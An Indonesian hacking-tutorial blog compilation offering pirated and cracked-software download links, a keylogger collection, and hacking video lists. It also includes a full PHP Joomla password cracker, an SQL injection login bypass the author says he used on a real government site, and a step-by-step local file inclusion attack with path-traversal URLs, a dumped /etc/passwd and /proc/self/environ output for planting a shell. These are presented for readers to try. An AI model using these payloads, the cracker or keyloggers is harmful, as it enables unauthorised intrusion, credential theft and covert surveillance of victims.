http://rapidshare.com/files/194379311/Gxc.VT.CAHPTaCT_UDS.part30.rar
http://rapidshare.com/files/194385532/Gxc.VT.CAHPTaCT_UDS.part31.rar
http://rapidshare.com/files/194385469/Gxc.VT.CAHPTaCT_UDS.part32.rar
http://rapidshare.com/files/194383279/Gxc.VT.CAHPTaCT_UDS.part33.rar
http://rapidshare.com/files/194385282/Gxc.VT.CAHPTaCT_UDS.part34.rar
http://rapidshare.com/files/194385524/Gxc.VT.CAHPTaCT_UDS.part35.rar
http://rapidshare.com/files/194385305/Gxc.VT.CAHPTaCT_UDS.part36.rar
http://rapidshare.com/files/194381537/Gxc.VT.CAHPTaCT_UDS.sfv
mirror  :
http://www.megaupload.com/?d=HROI2ZAV
http://www.megaupload.com/?d=242ZNM7E
http://www.megaupload.com/?d=QY14I10X
http://www.megaupload.com/?d=NHOLUTCO
http://www.megaupload.com/?d=Y9BSB284
http://www.megaupload.com/?d=5GCV9UA3
http://www.megaupload.com/?d=J41JSY0G
http://www.megaupload.com/?d=TXKSRAI8
http://www.megaupload.com/?d=DHF8UMKY
http://www.megaupload.com/?d=RLXSOPTK
http://www.megaupload.com/?d=5O0YFY79
http://www.megaupload.com/?d=RLHUHJDS
http://www.megaupload.com/?d=YNVEK8LB
http://www.megaupload.com/?d=RNYWZ64V
http://www.megaupload.com/?d=J42I6OSZ
http://www.megaupload.com/?d=1EC6S73S
http://www.megaupload.com/?d=25CAZSL2
http://www.megaupload.com/?d=0BZ0FPO1
http://www.megaupload.com/?d=JRPO74HU
http://www.megaupload.com/?d=Z6S34VR6
http://www.megaupload.com/?d=TDXJH9JZ
http://www.megaupload.com/?d=GNCSKLL3
http://www.megaupload.com/?d=LYI3SY94
http://www.megaupload.com/?d=8D3E0R6O
http://www.megaupload.com/?d=0022RC7Z
http://www.megaupload.com/?d=ASMBUELW
http://www.megaupload.com/?d=5XMX3AIZ
http://www.megaupload.com/?d=IPWD9NSU
http://www.megaupload.com/?d=DWQ3469B
http://www.megaupload.com/?d=WL91FDR7
http://www.megaupload.com/?d=TISTATGB
http://www.megaupload.com/?d=1OTQAHLA
http://www.megaupload.com/?d=Q2JTKAHH
http://www.megaupload.com/?d=OUNUNGAP
http://www.megaupload.com/?d=K4GMUQYF
http://www.megaupload.com/?d=QJNKWK0H
http://www.megaupload.com/?d=HP3D8TLB
mirror 2
http://www.mediafire.com/?sharekey=283842fd3dc3e7ef91b20cc0d07ba4d2abc972a2ae368c4b

semoga bermanfaat  :D:D:D

PHP Security – Cek Bug PHP Script


PHP Security   Cek Bug PHP Script tutorial hacking web desain 
grafisSetelah terampungkan script php yang telah kita buat ada  kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah  siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat  dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi  system.
   
Dan siapa sangka script php yang telah dibuat itu aman  dari kerentanan dalam masalah security. :D ~~~
   
Lalu, bagaimana mencegah sang hacker mengekploitasi,  bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui  script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua  ??  :D
 

Sebelum kita beralih maju ke langkah selanjutnya ada  baiknya untuk mengenali bug popular yang paling sering diexploitasi.
Penulis akan mencoba untuk memberikan sedikit penjelasan,  bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content  Management system maupun yang lainnya. Di antaranya :
- XSS ( Cross Site Scripting )- SQL Injection
- RFI ( Remote File Inclusion )
Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi  karena tidak adanya filtering pada html maupun java script.
 
Tetapi pada dasarnya defacing ( perubahan kontent ) hanya  terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat  mencuri cookie  kemudian menggunakannya  untuk berbuat sesuatu yang ... :D ~~
 
Contohnya :
Sensored [ maaf ]
SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker  yang mencoba melakukan inject query sql   melalui form ataupun via address bar pada browser internet.  Sebagai contohnya ketika penulis mencoba login  sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id  ).  Dengan menggunakan query ' or 1=1--  penulis pun berhasil login. Pada dasarnya ' atau single quote dan or 1=1-- itu  berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh  server sql adalah menjalankan query " select * ". Yang terjadi adalah  penulis diloloskan untuk login sebagai admin.
   
Berikut adalah gambar yang penulis capture ketika penulis  berhasil login sebagai admin pada situs http://www.sumsel.go.id
Gambar ini diambil sebelum penulis mengontak webmaster  via email untuk mempatch script phpnya.
   
RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika  melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut.  Apabila user memasukkan url evil script miliknya pada variable yang digunakan  dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut  dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan  command di server milik anda untuk merubah konten situs atau bahkan merusaknya.  :D ~~
Untuk contohnya silahkan anda cari di www.milw0rm.com :D ~
Keywordnya Remote File Inclusion. :D ~
Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm  ... tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat  secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara  tidak sengaja maupun sengaja. :D ~
   
Pada dasarnya untuk mengecek bug dapat dilakukan secara  online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di  localhost anda ( offline ) saja.
Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda  adalah sebuah addons mozilla firefox yang disediakan secara gratis.  Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.
   
Tools tersebut dapat  anda download disini :

http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi
Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection  digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena  penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax  sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah  digunakan telah disediakan untuk melakukan cek bug sql injection. :D
   
Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi
Penggunaanya pun tidak terlalu sulit.
Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler  interpreter ini nantinya digunakan untuk menjalankan script  inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke  direktori c:perlbin
Langkah selanjutnya :
1. Masukkan  script  yang akan anda scan kedalam sebuah direktori di c:perl php.
ex : c:perlwordpress.
2. Masuk ke command prompt, start | run | cmd | enter
3.  Setelah itu  masuk ke direktory c:perlbin, cd c:perlbin
4. Jalankan scriptnya,
C:Perlbin>perl.exe inclusionscanner.pl
#Will check a directory for all includes and unsets
#Coded by Ironfist (ironsecurity.nl)
#Usage: create a folder in your perlfolder and put the  files to be scanned in it
, next type the folder name below (eg myfolder)
#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)
 
Directory to read? c:perlwp
 
kemudian lihat hasilnya di c:perlbinresult.html
 
berikut hasil scan ketika penulis mencoba untuk melakukan  cek inclusion pada wordpress-2.3.3 :
   
  FOUND: require_once($locale_file);
  in c:perlwp/wp-settings.php FOUND:  require_once($import_root . '/' . $file);
  in c:perlwp/wp-admin/import.php FOUND:  include_once($this->PluginDir . "class-smtp.php");
  in c:perlwp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
  in c:perlwp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.'phpmailer.lang-en.php');
  in c:perlwp/wp-includes/class-phpmailer.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  require_once($_template_file);
in c:perlwp/wp-includes/theme.php



selamat mencoba...  

Konsep sederhana Joomla Password Cracker


Konsep sederhana Joomla Password Cracker tutorial 
hacking web desain grafisApa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada bolong yang masih dapat di eksploitasi,tapi setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang akan penulis terangkan nanti tentunya cenderung digunakan untuk kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan ini. Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas yang harus di lakukan sekarang adalah, tetap waspada pada security risk yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya untuk hadir memonitoring site anda, jika anda melakukan sedikit saja salah langkah akibatnya cukup fatal.
Waha... sepertinya intro tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai lupa pada pokok pembahasan. :D .
Ya, berdasarkan artikel sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan password sang administrator pada content management system seperti joomla, tapi masih terdapat satu masalah,  dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu password asli yang terenkripsi, namun penulis hanya membatasi cracking password pada satu jenis hash saja, yaitu joomla hash password. Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya. :D . Namun setiap aplikasi selalu saja memiliki kekurangan, penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik sang Pencipta. ;) Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar dari ukuran biasanya.
Berikut adalah source code lengkap 'simple joomla password cracker' :
-----------------------// cut here
<HTML>
<HEAD>
<BASEFONT SIZE=3>
<TITLE>::: Joomla Password Cracker :::</TITLE>

</HEAD>

<BODY BGCOLOR=#000000 vlink=#0000FF>

<center>
<p align="center"><font face="Verdana" size="1"><BR>
</B><BR>
  </font></p>
<p align="center"> </p>
<p align="center"> </p>
<TABLE BORDER=0 WIDTH=500 CELLPADDING=3 CELLSPACING=0>
<tr><td> <p align="center" style="margin-top: 0"><font color="#FFFFFF" face="Verdana" size="2"><u><font size="4">Simple</font></u>
</font><font size="4"><u><font face="Verdana" color="#00FF00"><strong>Joomla</strong></font> <font color="#FFFFFF" face="Verdana">Password Cracker</font></u></font><font size="2"><font color="#FFFFFF" face="Verdana"><br>
<font color="#00FF00">Developed by<strong> : ilmuwebsite.com </strong></font></font></font></p>
    </td>
</tr>
</table>
<!--  Demonstration -->
<BODY>
<center>
  <form action=index.php method="POST"><p>
    <P>
<b>
<font size="2" face="Verdana" color="#FFFFFF"><u>Masukkan  </u></font></b><u><font size="2" face="Verdana" color="#FFFFFF">password hashnya disini :</font></u><font size="2" face="Verdana" color="#FFFFFF"></font><font color="#00FF00" size="1" face="Verdana"><br>
<BR>
<input type="text" name="hash" size=55 style="font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000">
<input type="submit" name="send" value="Cari !!!" style="font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000">
</font>
<P><br>

</form>

<?php
$hashes=array();
$i=0;
$parts=explode(":",$_POST['hash']);
$hashes[$i][0]=$parts[0]; 
$hashes[$i][1]=$parts[1];

if (ISSET($_POST['hash']))
{
$str = " ";
echo "<font size=2 face=Verdana color=#FFFFFF><u>Started: </u>";
echo date("F j, Y, g:i:s a");

$lines = file('kamus2.txt');

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file('kamus1.txt');

foreach ($lines as $line_num => $line)
{
check($line);
}

echo "<br><font size=2 face=Verdana color=#FFFFFF><u>Finished : </u>";
echo date("F j, Y, g:i:s a");

}

function check($a)
{   
global  $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global  $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "<font size=2 face=Verdana color=#FFFFFF><br><br><u>The password is : </u></font><font size=2 face=Verdana color=#00FF00><h1>$a</h1></font>";
echo "<u>Ended: </u>";
echo date("F j, Y, g:i:s a");
}

}
        
}
?>
<font size="2" face="Verdana" color="#FFFFFF"><u><br><br>Tolong di kembangkan ya ?! :D </u></font>
</center>
</body></html>

-----------------------// cut here
Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;
Konsep sederhana Joomla Password Cracker tutorial 
hacking web desain grafis
menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;
Ya, sebelum berlanjut, penulis akan membahas struktur password joomla yang terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri dari hash dan salt.  Standar enkripsi joomla biasanya berbentuk seperti ini :
b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK
Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua ":". Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :
md5(x + salt) = hash
maka :
md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116
berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. :D huehuehuehehe...  )
Ya seperti pada baris kalimat ini :
...
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "<font size=2 face=Verdana color=#FFFFFF><br><br><u>The password is : </u></font><font size=2 face=Verdana color=#00FF00><h1>$a</h1></font>";
...
Dan hasilnya adalah ...
Konsep sederhana Joomla Password Cracker tutorial 
hacking web desain grafis
:D ~~
Penulis yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya pun cukup mudah. Script lengkap dan kamus passwordnya dapat di download di sini ...
Selamat mencoba. Selamat mengembangkan ! :D
Greetz for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli, safril, dr.emi, husniearif, [H], dan ilmuwebsite community.

sumber http://www.ilmuwebsite.com

Koleksi 63 Keylogger Pilihan

 Koleksi
 63 Keylogger Pilihan tutorial hacking web desain grafisBagi para lamerz maniak hacking tools pasti sering mendengar keylogger. :D . Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.

Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, :D silahkan unduh 63 keylogger terbaru  yang cukup handal ...
Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01
Mohon maaf, sementara link 63 keylogger di suspend terlebih dahulu, sampai kami upload ulang semua keyloggernya ke server local, sebagai gantinya silahkan mencoba keylogger yang tidak kalah powerfull http://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html

Huge Collection Of Hack Tutorial Videos

Huge Collection Of Hack Tutorial Videos tutorial hacking web desain
 grafisLagi-lagi koleksi video teknik hacking, yang berbeda dari yang pernah penulis post sebelumnya adalah video teknik hacking kali ini dikemas dalam resolusi 1024 x 768, 680 x 460, PAL (25fps), DivX. Dan yang lebih mantap adalah isi dari koleksi videonya :
  • 128 Bit Wep Cracking With Injection!.swf
  • A Penetration Attack Reconstructed.avi
  • A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf
  • Adding Modules to a Slax or Backtrack Live CD from Windows.swf
  • Airplay replay attack - no wireless client required.swf
  • Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf
  • BackTrack LiveCD to HD Installation Instruction Video .swf
  • Basic Nmap Usage!.swf
  • Basic Tools for Wardriving!.swf
  • Bluesnarfer attack tool demonstration.swf
  • Bluesnarfing a Nokia 6310i hand set.avi
  • Breaking WEP in 10 minutes.avi
  • Cain to ARP poison and sniff passwords!.avi
  • Complete Hacking Video using Metasploit - Meterpreter.swf
  • Cracking a 128 bit WEP key (Auditor).swf
  • Cracking a 128 Bit Wep key + entering the cridentials.swf
  • Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf
  • Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf
  • Cracking WPA Networks (Auditor).swf
  • DoS attack against Windows FTP Server - DoS.avi
  • Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf
  • Exploiting some bugs of tools used in Windows.swf.swf
  • Exploiting weaknesses of PPTP VPN (Auditor).swf
  • Finding Rogue SMB File Shares On Your Network!.swf
  • Fun with Ettercap Filters!.swf
  • How to cura the local windows passwords in the SAM database .swf
  • How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf
  • How to sniff around switches using Arpspoof and Ngrep!.avi
  • Install VNC Remotely!.avi
  • Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi
  • Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi
  • John The Ripper 1.7 password cracker Installation Instruction Video .swf
  • Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf
  • MAC Bridging with Windows XP and Sniffing!.swf
  • Mass De-Authentication using void11 (Auditor).swf
  • Metasploit Flash Tutorial!.swf
  • MITM Hijacking.wmv
  • Nmap Video Tutorial 2 Port Scan Boogaloo!.swf
  • Sniffing logins and passwords.avi
  • Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res).avi
  • Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi
  • Sniffing VoIP Using Cain!.swf
  • Snort Instruction video - howto install into backtrack.swf
  • SSH Dynamic Port Forwarding!.swf
  • Start a session and get interactive commandline access to a remote Windows box!.avi
  • Telnet Bruteforce.avi
  • Tunneling Exploits through SSH.avi
  • Use Brutus to cura a box running telnet!.avi
  • Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf
  • WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf
  • WMF File Code Execution Vulnerability With Metasploit!.swf
  • WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf
Silahkan di download di sini :
http://rapidshare.com/files/230824983/Huge_Collection_Of_Hacking_Videos.part1.rar
http://rapidshare.com/files/230825083/Huge_Collection_Of_Hacking_Videos.part2.rar
http://rapidshare.com/files/230825048/Huge_Collection_Of_Hacking_Videos.part3.rar
http://rapidshare.com/files/230824882/Huge_Collection_Of_Hacking_Videos.part4.rar
http://rapidshare.com/files/230824795/Huge_Collection_Of_Hacking_Videos.part5.rar
http://rapidshare.com/files/230824916/Huge_Collection_Of_Hacking_Videos.part6.rar
http://rapidshare.com/files/230824692/Huge_Collection_Of_Hacking_Videos.part7.rar
Bagi anda yang kesulitan untuk mendownload video tersebut, sudah kami sertakan dalam CD Hacking v.3 ( 3 DVD ).

Ebook: Menggunakan 100 Tools Hacking


Ebook: Menggunakan 100 Tools Hacking tutorial hacking web desain 
grafis(Update Ebook New Version) Satu lagi sumber kekuatan para IT Security, dan sumber yang di cari-cari oleh para newbie yang ingin tau lebih dalam teknik-teknik hacking/cracking, ada satu ebook yang patut dijadikan rujukan. Ebook ini berjudul "Anti-Hacker Toolkit". Dalam buku ini dijelaskan secara mendetil bagaimana cara menggunakan lebih dari 100 tools hacking. Penjelasannya secara teknis cukup mudah untuk dimengerti dan diikuti. Selain membawakan penjelasan tools dalam menyerang, disini juga dijelaskan topik mengenai mendeteksi adanya serangan dan menangani serangan tersebut. Topik-topik yang dibahas antara lain port scanners, vulnerability scanners, password crackers, and war dialers.

Toolsnya antara lain Netcat, Nessus, Tripwire, John the Ripper, and the Forensic Toolkit. Silahkan di unduh disini ...
http://www.megaupload.com/?d=G5HJ37DC

Rilis: Metasploit Framework v. 3.3

Rilis: 
Metasploit Framework v. 3.3 tutorial hacking web desain grafisKurang lebih 10 hari sebelum artikel hacking news ini ditulis, metasploit merilis kembali versi terbaru dari senjata pamungkas para penetration tester. Bagi anda yang belum mengetahui senjata pamungkas yang satu ini, Metasploit merupakan sebuah tools hacking untuk melakukan penetration testing dimana dalam framework ini terdapat banyak exploit yang siap pakai, tools yang satu ini bekerja mulai dari memanfaatkan celah sistem operasi, hingga celah aplikasi. Terdapat 120 exploit terbaru, dan lebih dari 100 module, dan 180 patch yang dapat digunakan langsung secara bebas.

Metasploit mirip dengan tools hacking lainnya, bagai Swiss Army Knife yang memiliki dua mata pisau, dimana satu sisi berguna untuk melindungi diri dari serangan dengan mencari-cari celah dan menambalnya, di sisi yang lain, metasploit apabila digunakan oleh tangan-tangan muda dan jahil maka akan terjadi hal destruktif yang merugikan banyak tentunya.
Kepada para admin, rajin-rajinlah mempatch sistem anda.
Lain kali penulis akan coba membahas lebih dalam mengenai Metasploit Framework, bagi anda yang ingin mengunduh dan mencoba untuk bersenang-senang dengan database metasploit yang terbaru silahkan langsung kunjungi website offisialnya http://www.metasploit.com/framework/download/

Tanam Shell via LFI dengan Metode Proc/Self/Environ

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja...
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php
2. coba kita ganti "news.php" dengan "../../../".
contoh : http://site.com/info.php?file=../../../
lalu kita mendapat error, seperti berikut...
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba...
contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti "/etc/passwd" dengan "/proc/self/environ"
contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
